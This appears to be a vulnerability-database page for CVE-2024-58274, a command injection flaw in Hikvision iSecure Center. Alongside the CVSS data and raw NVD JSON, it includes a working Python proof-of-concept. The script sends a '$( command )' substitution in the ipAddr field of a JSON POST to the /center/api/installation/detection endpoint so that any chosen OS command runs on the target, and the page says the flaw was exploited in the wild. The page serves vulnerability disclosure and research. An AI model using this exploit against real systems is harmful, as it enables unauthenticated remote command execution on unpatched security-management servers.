Security Vulnerability Report
中文
CVE-2024-58274 CVSS 8.3 HIGH

CVE-2024-58274

Published: 2025-10-22 04:15:56
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center through 2024-08-01 allows execution of a command within $( ) in /center/api/installation/detection JSON data, as exploited in the wild in 2024 and 2025.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hikvision iSecure Center <= 2024-08-01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-58274 - Hikvision iSecure Center Command Injection PoC # Vulnerability: Command Injection via /center/api/installation/detection endpoint # Payload injection through $( ) command substitution syntax in JSON data import requests import json TARGET_URL = "https://target-host" VULNERABLE_ENDPOINT = "/center/api/installation/detection" def exploit(target_url, command): """ Exploit CVE-2024-58274 by injecting OS commands via $( ) syntax in the JSON payload sent to the installation detection endpoint. """ url = f"{target_url}{VULNERABLE_ENDPOINT}" # Construct malicious JSON payload with command substitution payload = { "ipAddr": f"$( {command} )", "port": "80" } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } try: response = requests.post( url, data=json.dumps(payload), headers=headers, verify=False, timeout=10 ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text}") return response except Exception as e: print(f"[-] Error: {e}") return None # Example usage - execute arbitrary command if __name__ == "__main__": # Command to execute on the target server cmd = "id" # Change to any desired command exploit(TARGET_URL, cmd) # Nuclei template reference: # https://github.com/ahisec/nuclei-tps/blob/main/http/vulnerabilities/hikvision/hikvision-csmp-installation-rce.yaml

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58274", "sourceIdentifier": "[email protected]", "published": "2025-10-22T04:15:55.680", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center through 2024-08-01 allows execution of a command within $( ) in /center/api/installation/detection JSON data, as exploited in the wild in 2024 and 2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://forum.butian.net/article/498", "source": "[email protected]"}, {"url": "https://github.com/ahisec/nuclei-tps/blob/main/http/vulnerabilities/hikvision/hikvision-csmp-installation-rce.yaml", "source": "[email protected]"}, {"url": "https://xz.aliyun.com/news/14639", "source": "[email protected]"}, {"url": "https://xz.aliyun.com/news/14639", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.